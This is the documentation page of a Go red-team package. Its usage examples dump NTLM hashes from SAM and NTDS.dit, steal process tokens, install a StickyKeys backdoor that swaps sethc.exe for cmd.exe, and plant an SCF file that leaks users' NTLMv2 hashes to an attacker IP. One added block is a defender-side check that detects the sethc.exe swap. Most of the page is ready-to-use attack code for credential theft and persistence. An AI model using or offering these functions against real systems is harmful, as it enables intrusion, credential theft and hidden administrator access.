redteam

package v0.1.2

Warning: This package is not in the latest version of its module.

Published: Feb 3, 2023 License: MIT Imports: 14 Imported by: 0

README

Red Team Examples

Dump system hashes (different ways)

  • These functions use gosecretsdump, which is fast and can dump NTLM hashes with many configuration options
package main

import (
	"fmt"
	"log"

	"github.com/D3Ext/maldev/redteam"
)

func main() {
	// First way: parse exported SYSTEM and SAM hive files
	hashes1, err := redteam.DumpSamHashes("C:\\path\\to\\system", "C:\\path\\to\\sam")
	if err != nil {
		log.Fatal(err)
	}
	fmt.Println(hashes1)

	// Second way: parse exported SYSTEM and NTDS.dit files
	// (the function is named DumpDitHashes in the package index below)
	hashes2, err := redteam.DumpDitHashes("C:\\path\\to\\system", "C:\\path\\to\\ntds")
	if err != nil {
		log.Fatal(err)
	}
	fmt.Println(hashes2)

	// Third way: automated mode
	// (the function is named AutoDumpHashes in the package index below)
	hashes3, err := redteam.AutoDumpHashes()
	if err != nil {
		log.Fatal(err)
	}
	fmt.Println(hashes3)
}

Steal process token (impersonation)

package main

import (
	"log"

	"github.com/D3Ext/maldev/redteam"
)

func main() {
	pid := 1234 // PID of the process whose token is stolen
	token, err := redteam.Impersonate(pid) // Returns an error if the caller lacks the required privileges
	if err != nil {
		log.Fatal(err)
	}
	defer token.Close() // Release the token handle once it is no longer needed
}

StickyKeys backdoor

  • This function replaces the sethc.exe binary with cmd.exe, so pressing SHIFT 3 times launches a terminal as Administrator. It also creates a backup of the original sethc.exe so that RevertStickyKeys() can restore it
package main

import (
	"fmt"
	"log"

	"github.com/D3Ext/maldev/redteam"
)

func main() {
	// Replace sethc.exe (a backup of the original is created)
	err := redteam.StickyKeys()
	if err != nil {
		log.Fatal(err)
	}

	fmt.Println("Backdoor added successfully!")

	// Restore the original sethc.exe from the backup
	err = redteam.RevertStickyKeys()
	if err != nil {
		log.Fatal(err)
	}

	fmt.Println("Backdoor reverted!")
}
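A defender-side check for the state StickyKeys() leaves behind, added here as an example and not part of the maldev package: it hashes sethc.exe and cmd.exe in the same directory and reports whether they are byte-for-byte identical, which a genuine sethc.exe never is. The System32 path in main is an assumption.

```go
package main

import (
	"bytes"
	"crypto/sha256"
	"fmt"
	"io"
	"os"
	"path/filepath"
)

// fileSHA256 returns the SHA-256 digest of the file at path.
func fileSHA256(path string) ([]byte, error) {
	f, err := os.Open(path)
	if err != nil {
		return nil, err
	}
	defer f.Close()
	h := sha256.New()
	if _, err := io.Copy(h, f); err != nil {
		return nil, err
	}
	return h.Sum(nil), nil
}

// SethcSwapped reports whether sethc.exe in dir has the same digest as
// cmd.exe in dir, i.e. whether the accessibility binary has been replaced
// by a copy of the shell the way StickyKeys() does.
func SethcSwapped(dir string) (bool, error) {
	cmdSum, err := fileSHA256(filepath.Join(dir, "cmd.exe"))
	if err != nil {
		return false, err
	}
	sethcSum, err := fileSHA256(filepath.Join(dir, "sethc.exe"))
	if err != nil {
		return false, err
	}
	return bytes.Equal(cmdSum, sethcSum), nil
}

func main() {
	dir := `C:\Windows\System32` // assumed default; override with the first argument
	if len(os.Args) > 1 {
		dir = os.Args[1]
	}
	swapped, err := SethcSwapped(dir)
	if err != nil {
		fmt.Println("check failed:", err)
		os.Exit(1)
	}
	fmt.Printf("sethc.exe replaced by cmd.exe: %v\n", swapped)
}
```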

Create malicious SCF

  • This function creates a malicious SCF file that yields NTLMv2 hashes once a user opens the SMB share
package main

import (
	"log"

	"github.com/D3Ext/maldev/redteam"
)

func main() {
	path := "C:\\Path\\To\\Smb\\Share\\malicious.scf" // Path, including filename, where the SCF file will be stored
	ip := "192.168.1.37" // Attacker IP; if a responder is running there, it receives the NTLMv2 hashes

	err := redteam.CreateScf(path, ip)
	if err != nil {
		log.Fatal(err)
	}
}

Documentation

Index

Constants

This section is empty.

Variables

This section is empty.

Functions

func CreateScf

func CreateScf(filepath string, attacker_ip string) error

func GetToken

func GetToken() (windows.Token, error)

func Impersonate

func Impersonate(pid int) (windows.Token, error)

func RevertStickyKeys

func RevertStickyKeys() error

func StickyKeys

func StickyKeys() error

Types

type Hash

type Hash struct {
	Username string
	LM       []byte
	NT       []byte
	Rid      uint32
	Enabled  bool
	Supp     ditreader.SuppInfo
}

func AutoDumpHashes

func AutoDumpHashes() ([]Hash, error)

func DumpDitHashes

func DumpDitHashes(system_file string, ntds_file string) ([]Hash, error)

func DumpSamHashes

func DumpSamHashes(system_file string, sam_file string) ([]Hash, error)

func (Hash) Format

func (h Hash) Format() string
